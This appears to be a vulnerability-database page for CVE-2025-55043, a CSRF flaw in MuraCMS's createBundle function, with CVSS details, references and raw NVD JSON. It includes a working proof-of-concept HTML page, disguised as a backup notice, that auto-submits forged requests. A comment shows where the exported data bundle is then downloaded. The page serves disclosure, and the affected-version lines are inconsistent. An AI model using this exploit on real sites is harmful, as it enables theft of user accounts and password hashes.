CVE-2025-55043

Description

MuraCMS through 10.1.10 contains a CSRF vulnerability in the bundle creation functionality (csettings.cfc createBundle method) that allows unauthenticated attackers to force administrators to create and save site bundles containing sensitive data to publicly accessible directories. This vulnerability enables complete data exfiltration including user accounts, password hashes, form submissions, email lists, plugins, and site content without administrator knowledge. This CSRF vulnerability enables complete data exfiltration from MuraCMS installations without requiring authentication. Attackers can force administrators to unknowingly create site bundles containing sensitive data, which are saved to publicly accessible web directories. The attack executes silently, leaving administrators unaware that confidential information has been compromised and is available for unauthorized download.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:* - VULNERABLE

MuraCMS < 10.1.10

MuraCMS 10.1.0 - 10.1.10 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2025-55043: MuraCMS createBundle CSRF -->
<!DOCTYPE html>
<html>
<head>
    <title>Site Backup</title>
</head>
<body>
    <h1>Please wait while we process your request...</h1>
    <form id="csrfForm" action="http://TARGET/mura-admin/csettings.cfc" method="POST">
        <input type="hidden" name="method" value="createBundle">
        <input type="hidden" name="siteid" value="default">
        <input type="hidden" name="returnFormat" value="json">
    </form>
    <script>
        // Auto-submit the form when page loads
        document.addEventListener('DOMContentLoaded', function() {
            // Submit multiple times to ensure bundle is created
            for(let i = 0; i < 3; i++) {
                setTimeout(function() {
                    document.getElementById('csrfForm').submit();
                }, i * 1000);
            }
        });
    </script>
</body>
</html>

<!-- After exploitation, download the backup file -->
<!-- http://TARGET/sites/default/config/bundle_[timestamp].zip -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55043
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55043
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55043/
[4] VulDB https://vuldb.com/cve/CVE-2025-55043
[5] https://docs.murasoftware.com/v10/release-notes/#section-version-1014
[6] https://www.murasoftware.com

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55043", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:23.427", "lastModified": "2026-03-20T18:12:06.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MuraCMS through 10.1.10 contains a CSRF vulnerability in the bundle creation functionality (csettings.cfc createBundle method) that allows unauthenticated attackers to force administrators to create and save site bundles containing sensitive data to publicly accessible directories. This vulnerability enables complete data exfiltration including user accounts, password hashes, form submissions, email lists, plugins, and site content without administrator knowledge. This CSRF vulnerability enables complete data exfiltration from MuraCMS installations without requiring authentication. Attackers can force administrators to unknowingly create site bundles containing sensitive data, which are saved to publicly accessible web directories. The attack executes silently, leaving administrators unaware that confidential information has been compromised and is available for unauthorized download."}, {"lang": "es", "value": "MuraCMS hasta la versión 10.1.10 contiene una vulnerabilidad CSRF en la funcionalidad de creación de paquetes (método createBundle de csettings.cfc) que permite a atacantes no autenticados forzar a los administradores a crear y guardar paquetes de sitio que contienen datos sensibles en directorios de acceso público. Esta vulnerabilidad permite la exfiltración completa de datos, incluyendo cuentas de usuario, hashes de contraseñas, envíos de formularios, listas de correo electrónico, plugins y contenido del sitio, sin el conocimiento del administrador. Esta vulnerabilidad CSRF permite la exfiltración completa de datos de instalaciones de MuraCMS sin requerir autenticación. Los atacantes pueden forzar a los administradores a crear paquetes de sitio sin saberlo, que contienen datos sensibles, los cuales se guardan en directorios web de acceso público. El ataque se ejecuta silenciosamente, dejando a los administradores sin saber que la información confidencial ha sido comprometida y está disponible para descarga no autorizada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB4646EE-1255-4B42-890A-E0B57EBFE2CE"}]}]}], "references": [{"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.murasoftware.com", "source": "[email protected]", "tags": ["Product"]}]}}